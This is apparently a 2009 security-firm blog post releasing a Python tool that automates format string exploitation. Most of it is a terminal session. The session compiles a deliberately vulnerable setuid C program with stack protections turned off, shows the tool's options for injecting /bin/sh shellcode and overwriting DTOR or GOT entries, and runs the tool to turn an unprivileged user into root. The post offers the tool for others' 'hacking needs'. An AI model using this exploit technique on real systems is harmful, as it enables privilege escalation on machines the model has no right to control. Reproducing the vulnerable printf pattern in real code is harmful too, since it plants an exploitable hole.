Automatic Format String Exploitation
by The Shell Shakespeare on Nov.25, 2009, under Redspin Labs
Here at Redspin, we don’t often get a chance to fool around with binaries. Nevertheless, during an audit we encountered a program with a simple format string attack. Not content with the manual format string exploitation process, we decided to write our own tool to automate it. After much coding, we saw that it was good, and decided to share:
root@bt:~# wget http://www.redspin.com/blog/wp-files/Format%20String%20Auto%20Exploitation.tar.bz2
root@bt:~# tar jxvf Format\ String\ Auto\ Exploitation.tar.bz2
root@bt:~# cd Format\ String\ Auto\ Exploitation
root@bt:~/Format String Auto Exploitation# ls
auto_test.sh format_exploit_automagic.py Makefile printf.c README.txt
root@bt:~# cat printf.c
#include
int main(int argc, char **argv){printf(argv[1]);}
root@bt:~/Format String Auto Exploitation# make
gcc -w -O0 -ggdb -std=c99 -c printf.c
gcc -static -D_FORTIFY_SOURCE=0 -fno-pie -Wno-format -Wno-format-security -fno-stack-protector -z norelro -z execstack printf.o -o printf
root@bt:~/Format String Auto Exploitation# sudo chmod +s ./printf
root@bt:~/Format String Auto Exploitation# adduser dummy
Adding user `dummy' ...
Adding new group `dummy' (1000) ...
Adding new user `dummy' (1000) with group `dummy' ...
Creating home directory `/home/dummy' ...
Copying files from `/etc/skel' ...
Enter new UNIX password:
Retype new UNIX password:
passwd: password updated successfully
Changing the user information for dummy
Enter the new value, or press ENTER for the default
Full Name []:
Room Number []:
Work Phone []:
Home Phone []:
Other []:
Is the information correct? [Y/n] y
root@bt:~/Format String Auto Exploitation# su dummy
dummy@bt:/root/Format String Auto Exploitation$ id
uid=1000(dummy) gid=1000(dummy) groups=1000(dummy)
dummy@bt:/root/Format String Auto Exploitation$ ls -al ./printf
-rwsr-sr-x 1 root root 576267 2009-11-25 17:13 ./printf
dummy@bt:/root/Format String Auto Exploitation$ python format_exploit_automagic.py -h
Usage: format_exploit_automagic.py [options] binary
Attempt automatic format string exploitation on the provided binary.
Default action is to insert setreuid(geteuid(),geteuid()); execve('/bin/sh',0,0)
shellcode at the end of the format string, and overwrite the DTOR address of the
binary to return to it.
Options:
-h, --help show this help message and exit
-v, --verbose Increase verbosity (specify multiple times for more) default is 2
-q, --quiet Decrease verbosity (specify multiple times for more)
Overwrite options:
Arguments to determine location to overwrite in binary
-d, --dtor overwrite dtor address (True)
-g function, --got=function Overwrite GOT function (ie: exit)
-c, --code Overwrite first code segment return address found on stack
-a 0x12345678, --address=0x12345678 Custom overwrite address
Exploit options:
Arguments that control the how and where of our shellcode
-s, --string Insert shellcode within format string (True)
-S shellcode, --Shellcode=shellcode Insert Custom shellcode in format string (ie: setuid(0); exec '/bin/sh')
-E, --Environ Put shellcode into environment and use it
-e name, --environ=name Use address of given environment variable
-b 90909090, --bytes=90909090 Find byte string on stack and point to it
-r 0x12345678, --return=0x12345678 Custom shellcode address
-o 123, --offset=123 Custom stack offset to format string
dummy@bt:/root/Format String Auto Exploitation$ python format_exploit_automagic.py ./printf
# whoami
root
# 0wn3d!
(null): 0wn3d!: not found
The tool and accompanying files are here Format String Auto Exploitation.tar.bz2, or you can just get the Python script here: format_exploit_automagic.py.
Even though it is POC, it should be easily modified to support other programs vulnerable to format string attacks, and has been licensed under a GPLv3 license for your hacking needs. I’m considering porting it to Ruby, adding 64bit exploitation and merging it with the Metasploit tree, but figured I’d release it as-is to see if there’s still any interest in old school binary exploitation. I’m also happy to discuss the techniques the tool uses as well, if anyone is interested.
Let me know if you have any issues/hacks/recommendations.
POC: What are you thankful for?
